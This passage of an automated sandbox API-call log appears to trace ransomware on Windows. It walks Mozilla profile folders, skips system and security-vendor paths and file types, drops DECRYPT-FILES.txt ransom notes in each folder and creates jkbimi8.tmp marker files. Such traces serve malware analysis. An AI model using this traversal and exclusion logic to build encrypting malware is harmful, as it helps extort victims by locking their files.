HALPmcxz\\AppData\\Roaming\\Mozilla\\" [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Program Files") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch=":\\Windows") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Games\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\All Users") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="AhnLab") returned 0x0 [0080.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.543] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0080.543] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.543] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\jkbimi8.tmp") returned 66 [0080.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0080.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0080.544] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.544] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\DECRYPT-FILES.txt") returned 72 [0080.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0080.547] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0080.548] CloseHandle (hObject=0x444) returned 1 [0080.548] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0080.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*" [0080.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0080.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.548] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.549] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.549] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.549] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0080.549] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0080.549] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0080.549] lstrcatW (in: lpString1="Extensions", lpString2="\\" | out: lpString1="Extensions\\") returned="Extensions\\" [0080.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Program Files") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch=":\\Windows") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Games\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\All Users") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="AhnLab") returned 0x0 [0080.549] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0080.549] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.549] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\jkbimi8.tmp") returned 77 [0080.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0080.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0080.550] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.550] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\DECRYPT-FILES.txt") returned 83 [0080.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0080.551] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0080.551] CloseHandle (hObject=0x44c) returned 1 [0080.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0080.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0080.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0080.552] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.552] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.552] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.552] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.552] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.552] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.552] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.552] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.552] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.552] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.552] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.553] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.553] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0080.553] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.553] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" [0080.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\jkbimi8.tmp" [0080.553] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.553] CloseHandle (hObject=0x0) returned 0 [0080.553] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.553] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.553] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0080.553] CloseHandle (hObject=0x448) returned 1 [0080.554] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 1 [0080.554] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0080.554] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0080.554] lstrcatW (in: lpString1="Firefox", lpString2="\\" | out: lpString1="Firefox\\") returned="Firefox\\" [0080.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Program Files") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch=":\\Windows") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Games\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\All Users") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="AhnLab") returned 0x0 [0080.554] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0080.554] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.554] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\jkbimi8.tmp") returned 74 [0080.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0080.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0080.555] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.555] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\DECRYPT-FILES.txt") returned 80 [0080.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0080.557] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0080.558] CloseHandle (hObject=0x44c) returned 1 [0080.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0080.558] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0080.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0080.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.559] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.559] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.559] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, 